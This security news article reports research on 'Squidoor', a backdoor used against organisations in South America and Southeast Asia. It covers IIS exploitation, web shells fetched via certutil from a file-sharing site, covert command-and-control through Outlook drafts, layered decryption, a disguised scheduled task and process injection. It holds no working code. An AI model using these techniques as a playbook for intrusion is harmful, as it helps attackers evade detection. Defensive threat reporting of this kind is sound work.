A sophisticated backdoor malware called “Squidoor” being deployed by suspected Chinese threat actors against organizations across South America and Southeast Asia.
The malware, designed for exceptional stealth, offers attackers multiple methods to maintain persistent access to compromised networks while evading detection from advanced security systems.
Initial access is gained primarily through exploiting vulnerabilities in Internet Information Services (IIS) servers, followed by the deployment of multiple web shells that serve as persistent backdoors.
These web shells exhibit significant similarities in their structure and obfuscation techniques, suggesting a common origin.
Palo Alto Networks researchers identified that Squidoor is a sophisticated multi-platform backdoor built specifically to operate undetected in highly monitored and secured networks.
.webp)
The malware exists in both Windows and Linux variants, demonstrating the threat actor’s commitment to compromising diverse environments regardless of operating system.
The technical sophistication of Squidoor is particularly evident in its communication mechanisms.
The Windows version supports ten different protocols for command and control (C2) communication, while the Linux version supports nine.
.webp)
These methods include HTTP-based communication, reverse TCP/UDP connections, DNS tunneling, and even Microsoft Outlook mail API communication, allowing attackers to adapt to different network environments and security controls.
“The threat actor stored some of the web shells on bashupload.com and downloaded and decoded them using certutil,” according to the research report.
The attackers then used curl and Impacket to spread the web shells across different servers within compromised networks.
Outlook Transport Channel: A Stealthy Communication Vector
Perhaps the most innovative aspect of Squidoor is its ability to leverage Microsoft Outlook as a covert communication channel.
.webp)
When configured to use this method, the malware logs into the Microsoft identity platform using a hard-coded refresh token.
It then queries the drafts folder in Outlook, searching for emails with specific subject line patterns containing randomly generated numbers that help differentiate between different Squidoor implants.
The communication flow involves sophisticated encoding and encryption techniques.
Email contents undergo multiple stages of processing: transformation using CryptStringToBinaryA WinAPI, Base64 decoding, a combination of AES and custom XOR decryption, and finally zlib decompression.
This deobfuscated content provides commands for Squidoor to execute, ranging from reconnaissance to payload injection.
For persistence, Squidoor creates a scheduled task named “MicrosoftWindowsAppIDEPolicyManager” that executes the malicious shellcode at regular intervals, ensuring the backdoor remains active even after system reboots.
The malware can also inject additional payloads into legitimate processes like mspaint.exe, conhost.exe, and taskhostw.exe to further conceal its activities.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
